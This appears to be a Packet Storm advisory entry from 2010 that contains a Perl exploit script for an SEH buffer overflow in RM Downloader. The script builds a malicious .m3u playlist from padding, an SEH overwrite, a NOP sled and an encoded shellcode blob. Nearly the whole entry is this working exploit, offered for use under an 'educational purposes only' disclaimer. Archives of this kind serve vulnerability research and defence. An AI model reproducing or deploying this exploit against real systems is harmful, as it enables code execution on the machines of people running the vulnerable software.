RM Downloader .m3u Buffer Overflow

2010-01-20T00:00:00
ID PACKETSTORM:85422
Type packetstorm
Reporter Jacky
Modified 2010-01-20T00:00:00

Description

                                        
                                            `#RM Downloader m3u Buffer Overflow (SEH) (Perl Edition )  
#Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)  
#Written by Jacky  
#All Greetz for Peter Van Eeckhoutte and Corelan Team !!!  
#I tried to exploit it by a Direct Ret , but on my system , it doesn't seem that it's a Direct  
#Ret Vulnerability , so i tried by SEH and Voila !  
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!  
#!/usr/bin/perl -w  
my $file="RM.m3u";  
my $junk="A"x35059;  
my $nseh="\xeb\x1e\x90\x90";  
my $seh="\x1F\xEA\x02\x10"; # 0x1002EA1F::> Thanks for Peter who gave me this  
#address and it worked Perfectly ;-)  
#This Address works too ::> 0x01DD1111  
my $nops="\x90"x25;  
my $esp="\xbf\x1b\xaf\xd9\xd2\x2b\xc9\xb1\x24\xdb\xda\xd9\x74\x24\xf4\x5b".  
"\x31\x7b\x0e\x83\xeb\xfc\x03\x60\xa5\x3b\x27\x6a\x51\xff\xc8\x92".  
"\xa2\x8b\x8c\xae\x29\xf7\x0b\xb6\x2c\xe7\x9f\x09\x37\x7c\xc0\xb5".  
"\x46\x69\xb6\x3e\x7c\xe6\x48\xae\x4c\x38\xd3\x82\x2b\x78\x90\xdd".  
"\xf2\xb3\x54\xe0\x36\xa8\x93\xd9\xe2\x0b\x58\x68\xee\xdf\x3f\xb6".  
"\xf1\x34\xd9\x3d\xfd\x81\xad\x1e\xe2\x14\x59\x2b\x06\x9c\x9c\xc0".  
"\xbe\xfe\xba\x12\x02\xcf\x02\x7e\x0f\x70\xb3\xfb\xcf\x09\xbf\x88".  
"\x90\xe5\x34\xfe\x0c\x5b\xc1\x96\x24\x48\xdf\xed\xb5\x3e\xe0\xf1".  
"\xb5\xb5\x89\xcd\xea\xf8\xbf\x4d\x43\x72\xc7\x0e\xab\xff\x68\x78".  
"\xdc\x8a\x8d\x27\x74\x13\x73\x5d\x8a\x74\x73\x86\xf0\x1b\xe7\x2b".  
"\xd9\xbe\x8f\xce\x25";  
  
my $junk2="A"x5000;  
my $payload=$junk.$nseh.$seh.$nops.$esp.$junk2;  
  
  
open(INI,">$file");  
print INI $payload;  
print "[+]File Created Successfully!\n";  
print "[+]Done!\n";  
close(INI);  
  
  
________________________________  
Windows Live: Make it easier for your friends to see what you’re up to on Facebook.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_2:092009>  
`